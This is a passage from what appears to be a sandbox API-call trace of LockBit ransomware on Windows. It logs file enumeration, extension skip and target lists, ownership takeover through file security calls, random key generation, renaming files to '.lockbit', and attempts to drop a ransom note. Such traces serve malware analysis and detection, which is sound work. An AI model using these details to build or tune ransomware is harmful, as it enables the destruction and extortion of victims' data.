(lpString1=".db", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0084.924] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0084.925] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0084.925] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv.lockbit") returned 76 [0084.925] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.926] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.926] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.926] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.927] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.927] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.927] RtlFreeAnsiString (AnsiString="\\") [0084.927] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0084.927] malloc (_Size=0x200) returned 0x77d800 [0084.927] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.927] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.927] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.927] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.928] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.928] CloseHandle (hObject=0x3bc) returned 1 [0084.928] free (_Block=0x77d800) [0084.928] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0084.929] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.929] malloc (_Size=0x40068) returned 0x3d70048 [0084.929] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=797322) returned 1 [0084.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0084.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0084.930] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0084.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.962] malloc (_Size=0xae) returned 0x1ff1e60 [0084.982] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0084.982] free (_Block=0x1ff1e60) [0084.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.982] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.982] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.982] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7223f430, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7223f430, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ecf6083, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scenes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0084.983] lstrcmpiW (lpString1=".", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.983] lstrcmpiW (lpString1="..", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.983] PathFindExtensionW (pszPath="Scenes_LOOP_BG_PAL.wmv") returned=".wmv" [0084.983] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0084.983] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0084.984] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0084.984] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.984] lstrcmpiW (lpString1="ntldr", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.984] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.985] lstrcmpiW (lpString1="autorun.inf", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.985] lstrcmpiW (lpString1="thumbs.db", lpString2="Scenes_LOOP_BG_PAL.wmv") returned 1 [0084.985] lstrcmpiW (lpString1="iconcache.db", lpString2="Scenes_LOOP_BG_PAL.wmv") returned -1 [0084.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv") returned=".wmv" [0084.985] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0084.985] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0084.985] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0084.986] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0084.986] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.lockbit") returned 80 [0084.986] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.986] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.987] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.987] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.987] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.987] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.987] RtlFreeAnsiString (AnsiString="\\") [0084.987] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0084.987] malloc (_Size=0x200) returned 0x77d800 [0084.987] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.987] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.987] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.987] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.988] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.988] CloseHandle (hObject=0x3bc) returned 1 [0084.988] free (_Block=0x77d800) [0084.988] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0084.989] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.989] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.989] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=869322) returned 1 [0084.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.990] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.992] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.992] malloc (_Size=0xb6) returned 0x1ff1e60 [0084.992] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0084.993] free (_Block=0x1ff1e60) [0084.993] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.993] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.993] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.993] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72323c5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72323c5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ed4233f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe3dca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Page_Ref.wmv", cAlternateFileName="")) returned 1 [0084.993] lstrcmpiW (lpString1=".", lpString2="Title_Page_Ref.wmv") returned -1 [0084.993] lstrcmpiW (lpString1="..", lpString2="Title_Page_Ref.wmv") returned -1 [0084.993] PathFindExtensionW (pszPath="Title_Page_Ref.wmv") returned=".wmv" [0084.994] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0084.994] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0084.995] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0084.995] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="ntldr", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_Page_Ref.wmv") returned -1 [0084.996] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.996] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv") returned=".wmv" [0084.996] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0084.996] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0084.996] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0084.997] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 